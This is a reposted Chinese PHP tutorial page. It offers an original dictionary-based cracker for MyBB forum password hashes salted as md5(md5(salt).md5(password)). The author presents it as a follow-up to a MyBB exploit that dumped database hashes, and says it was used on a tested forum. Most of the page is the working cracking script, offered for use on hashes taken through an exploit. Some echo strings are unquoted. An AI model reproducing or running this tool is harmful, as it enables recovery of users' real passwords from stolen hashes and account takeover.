MyBB論壇程式密碼暴力破解工具PHP版_PHP教程

來源:互聯網
上載者:User
前兩天和消失看的那個myBB論壇的exploit之後,破解出來的密碼很變態~是經過md5(md5(salt).md(pass))這種形式的~
一直沒有進展~今天編寫了一個小的利用程式~希望大家能用得上~
pass.txt為密碼字典~~一行一個~

另外,雖然程式中用了很垃圾的英文字元,但是程式絕對原創~

[Copy to clipboard] [ - ]CODE:
/*
MyBB論壇程式密碼暴力破解工具PHP版 By Cool_wXd[C.R.S.T]
本程式主要是針對MyBB論壇程式密碼加密形式md5(md5(salt).md5(password))
由於網路上針對MyBB的exploit程式只是破解出來資料庫中的密碼,而沒有破解出來真正的密碼
也是由於最近遇到這樣的問題,所以寫出這麼一個簡單的小程式希望能夠有所協助!
*/
if ($argc<3)
{
print "--------------------------------------------------------------";
print " MyBB Password Cracker v1.0";
print "--------------------------------------------------------------";
print "Usage: mybb_password_cracker.php [md5_hash] [salt]";
print "--------------------------------------------------------------";
print "http://www.wolfexp.net & http://hi.baidu.com/cool_wxd";
print " By Cool_wXd[C.R.S.T]";
print "--------------------------------------------------------------";
die;
}
function salt_password($password, $salt)
{
return md5(md5($salt).md5($password));
}
$md5_hash = $argv[1];
$salt = $argv[2];
$dict="pass.txt";//password dictionary
if (strlen($md5_hash)!=32) {echo Error... The md5_hash must be 32 bits; die;}
if(!file_exists($dict)) {echo Can not find the password dictionary;die;}
$dict_pass=file($dict);
$num=sizeof($dict_pass);
for($i=0;$i<$num;$i++)
{
$now_password=chop($dict_pass[$i]);
if($md5_hash==salt_password($now_password,$salt)) {echo Success!(.$md5_hash.)is cracked and the true password is:(.$now_password.);break;}}
?>
另外,我們測試的那個論壇中我們註冊帳號的密碼破解



http://www.bkjia.com/PHPjc/508529.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/508529.htmlTechArticle前兩天和消失看的那個myBB論壇的exploit之後,破解出來的密碼很變態~是經過md5(md5(salt).md(pass))這種形式的~ 一直沒有進展~今天編寫了一個小...

  • 相關文章

    聯繫我們

    該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

    如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.